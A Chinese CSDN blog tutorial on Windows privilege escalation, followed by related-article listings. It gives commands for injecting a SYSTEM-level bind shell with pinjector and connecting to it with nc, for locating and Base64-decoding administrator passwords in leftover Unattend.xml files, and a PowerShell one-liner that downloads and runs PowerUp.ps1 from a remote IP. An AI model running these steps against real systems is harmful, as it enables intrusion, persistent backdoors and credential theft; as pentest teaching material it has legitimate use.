Windows提权—进程注入、Unattended Installs提权

最新推荐文章于 2024-04-20 09:42:03 发布
最新推荐文章于 2024-04-20 09:42:03 发布
阅读量906 收藏 3
点赞数
分类专栏: 渗透测试 后渗透 文章标签: windows linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/120253733
版权

进程注入提权

使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system权限
注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现

下载pinjector.exe

https://www.tarasco.org/security/Process_Injector/index.html

上传 pinjector.exe到靶机可执行目录

##列取所有进程
pinjector.exe -l

在这里插入图片描述

##选择一个system权限运行的进程,对此pid进程执行注入,并建立侦听端口
pinjector.exe -p <pid> cmd <port>

在这里插入图片描述

##使用 nc 连接目标服务器端口
nc -nv 192.168.0.117 5555

连接成功,获取到system权限的shell
在这里插入图片描述

Unattended Installs提权

通常大型组织在部署某些员工较多或时间紧缺的程序时,会使用Unattended Installs自动安装,这种方式允许程序在不需要管理员的操作下进行自动安装,这种方式在部署程序前期较有用,但它也会在系统中残留一个名为Unattend的XML文件,这个XML 件包含所有在安装程序过程中的配置,包括一些本地用户的配置,以及管理员账户等。

Unattend.xml 文件通常在以下文件夹中

C:\sysprep.inf

C:\syspreg\sysprep.xml

C:\Windows\system32\sysprep.inf

C:\windows\system32\sysprep\sysprep.xml

C:\unattend.xml

C:\Windows\Panther\Unattend.xml

C:\Windows\Panther\Unattended.xml

C:\Windows\Panther\Unattend\Unattended.xml

C:\Windows\Panther\Unattend\Unattend.xml

C:\Windows\System32\Sysprep\Unattend.xml

C:\Windows\System32\Sysprep\Panther\Unattend.xml

也可以使用命令全盘搜索Unattend文件

dir /b /s c:\unattend.xml

除此之外,系统中遗留的 sysprep.xmlsysprep.inf 文件中也可能包含部署系统时使用的凭证信息,可以通过利用这些信息进行提权。

通过搜索 UserAccounts 、Administrators、password 等对凭证进行定位
部分文件内容如下:

<UserAccounts> 
    <LocalAccounts> 
        <LocalAccount> 
            <Password> 
                <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value>                         <PlainText>false</PlainText> 
            </Password> 
            <Description>Local Administrator</Description>                        <DisplayName>Administrator</DisplayName>                             <Group>Administrators</Group> 
            <Name>Administrator</Name> 
        </LocalAccount> 
    </LocalAccounts> 
</UserAccounts>

在以上文件中,可以看到 一个本地账户被创建并加入到了管理员组中。
可以猜测密码的值应该是以Base64进行编码的
对密码值进行Base64解码

UEBzc3dvcmQxMjMhUGFzc3dvcmQ=
##解码得到
P@ssword123!Password

通常微软会在编码前的密码后加上password,
所以这里本地管理员的密码实际上是:P@ssword123!

MSF中的利用模块
使用 post/windows/gather/enum_unattend 模块枚举连接的session中的Unattend

msf6 > use post/windows/gather/enum_unattend
msf6 > set session 1
msf6 >exploit

powershell 利用模块搜寻

powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://120.79.66.58/mypowershell/PowerUp.ps1');Get-UnattendedInstallFile"

参考:
https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/
https://www.cnblogs.com/zpchcbd/p/12232683.html

Thgilil
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
进程注入进程提权
WgpSec狼组安全团队
06-04 1123
本文作者:Gality 本文字数:7928字 阅读时长:20分钟 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 最近在研究进程注入相关的东西,主要是参考process-
Windows无人值守文件unattend制作以及自定义系统安装
weixin_30906185的博客
04-09 4294
原文链接:Create media for automated unattended install of Windows 10   我从来没看到过像上面的文章一样这么详细的描述过Windows10的无人值守安装过程,看完长知识了,值得一看。之后我会将自己的制作过程发出来,让大家学习一下。   只为了学习,如果有侵权请您联系我,我会将此文删除。 推荐:   PowerShell Sc...
Windows本地提权 · 上篇
qq_61553520的博客
05-31 1626
Windows本地提权,这种提权适用于有一本地个用户的基础上,有一定的权限,无法从webshell上进行提权
探索技术创新: Injector - 动态代码注入工具
最新发布
gitblog_00064的博客
04-20 380
探索技术创新: Injector - 动态代码注入工具 项目地址:https://gitcode.com/nefarius/Injector Injector 是一个由 nefarius 开发的开源项目,主要功能是实现动态代码注入到运行中的进程。它基于 C++ 编写,提供了强大的功能和灵活的接口,为开发者提供了深入操作系统级别的可能性。 项目简介 Injector 的核心目标是提供一种方式,让开发...
Windows进程注入提权
星落的博客
05-12 1445
通过进程注入不会创建新的进程,隐蔽性比较高,可以通过"pinjector"工具实现进程注入 工具使用方法 pinjector.exe -l 查看可利用的进程 pinjector.exe -p pid cmd port 对pid进程执行注入,并建立侦听端口 pinjector.exe -p 428 cmd 4444 nc -nv 192.168.31.132 4444获得system权限的shell。 ...
内网渗透-----权限分析及防御
qq_43590351的博客
10-20 3021
内网权限提升及防御
Windows Unattended Install Web GUI-开源
05-06
该项目旨在创建一个基于Web的GUI,以使用ASP生成Microsoft Windows 2000 / NT / XP操作系统的unattended.txt和winnt.sif安装文件。
VMware ESXi 5 PXE unattended scripted installation using Windows
07-02
VMware ESXi 5 PXE unattended scripted installation using Windows
unattended
10-26
标题“unattended”所指的是一个自动化安装环境,通常在Linux环境中用于无值守的系统部署,即 PXE(Preboot Execution Environment)服务器的构建。PXE允许计算机通过网络启动并自动安装操作系统,无需人工干预,极...
ubuntu-12.04-unattended
05-29
根据需要自定义 cd-files/ks.cfg 和 cd-files/preseed/unattended.seed。 您可能特别想更改密码。 使用以下命令创建 CD 映像: 须藤./make.sh path_to_ubuntu_server_cd_.iso 哪个创建/tmp/custom.iso 将映像...
unattended_upgrades:自动更新Nextcloud应用
05-27
'unattended_upgrades' => [ // your preferences ], 维护窗口 您可以设置允许升级的时间窗口。 'unattended_upgrades' => [ 'maintenance_window' => [ 'start' => '06:00', 'end' => '08:00', ], ], 被...
Injector注入工具.zip
05-18
dllInjector是一个dll注入工具,支持 win10最新版。 它具有以下特性: 多种外观和允许自定义GUI 进程列表选择或者桌面程序选择 多dll注入支持(并支持enable/disable选择) 自动开启注入 隐藏注入行为 dll抢占式注入 取消dll注入 多种注入方法(Standard, LdrLoadDll Stub, LdrpLoadDll Stub, Thread Hijacking and Manual Map) 支持拖拽操作 支持x64平台 Visual C++依赖库自动安装 注册后导出导出的功能函数
远程hook dll注入winlogin进程 system权限
04-20
远程hook dll注入winlogin进程 system权限
MSF 下域内渗透
A_991128a的博客
03-15 256
先获取域内机器sessionrun get_local_subnets //获取本地网络子网掩码route add 192.168.233.0 255.255.255.0 1 //添加路由表run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由run autoroute -s 192.168.2.0/24 //添加动态路由route print //打印路由表。
本地提权
weixin_45605313的博客
06-01 604
本地提权windowSysinternalsSuite->PsExec.exe利用系统命令进程注入pinjector.exe(隐蔽)fgdumpmimikatzwin缓存密码linux脏牛suid/etc/passwd文件的配置不当sudo组 window 常见window权限: 普通用户:user 管理员:administrator 系统:system admin->system SysinternalsSuite->PsExec.exe 微软发布的一套非常强大的免费工具程序集 Ps
关于本地提权的学习笔记(二):注入进程和利用漏洞提权
Mi1k7ea
02-26 3685
本文为学习笔记,很多不足之处望各位指导一下~ 注入进程提权: 该方式在实现提权的同时给系统安放了后门,以便于进行隐蔽的监听。 下载pinjector.exe程序: https://www.tarasco.org/security/Process_Injector/ 然后将该程序放入system32目录中,在命令行中输入pinjector,提示有-l和-p两个参数,先输入pinje
MyEclipse使用教程:unattended安装
需要界面开发、IDE工具研发中文教程资料的小伙伴,记得私信我~
06-28 273
【MyEclipse CI 2019.4.0安装包下载】 以下内容适用于2013及以上版本。 运行无提示安装程序 1. 创建一个unattended response文件。 2. 要激活unattended模式,请使用命令行运行安装程序文件中以下参数: <offline-installer>.exe --unattended <absolute path to file...
内网渗透工具MSF使用教程
CC__Faker的博客
04-01 2630
MSF介绍 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 常见指令 use[exploits/payloads/auxiliary] //指定一个模块并使其开始工作 show[exploits/payloads/auxiliary/options] //显
: 无法获得锁 /var/lib/dpkg/lock-frontend。锁正由进程 4546(unattended-upgr)持有
07-28
你遇到的问题是由于进程 4546(unattended-upgr)持有了锁文件 /var/lib/dpkg/lock-frontend 导致的。这种情况通常发生在系统正在进行软件包管理操作时,例如升级或安装软件包。由于锁文件已被其他进程占用,所以你无法获取到锁。 要解决这个问题,你可以尝试以下几种方法: 1. 等待一段时间:等待一段时间,让进程 4546 完成它的操作并释放锁。然后再尝试执行你的操作。 2. 杀死进程:如果等待时间过长或者你确定进程 4546 不再需要运行,你可以尝试杀死该进程。可以使用命令 `sudo kill 4546` 来终止进程,并释放锁文件。 3. 删除锁文件:如果以上方法都不起作用,你可以尝试手动删除锁文件。使用命令 `sudo rm /var/lib/dpkg/lock-frontend` 来删除锁文件,然后再尝试执行你的操作。请注意,删除锁文件可能会导致系统中未完成的软件包操作出现问题,请谨慎操作。 请记住,在执行任何操作之前,最好先备份重要数据,并确保你具备足够的权限来执行这些操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值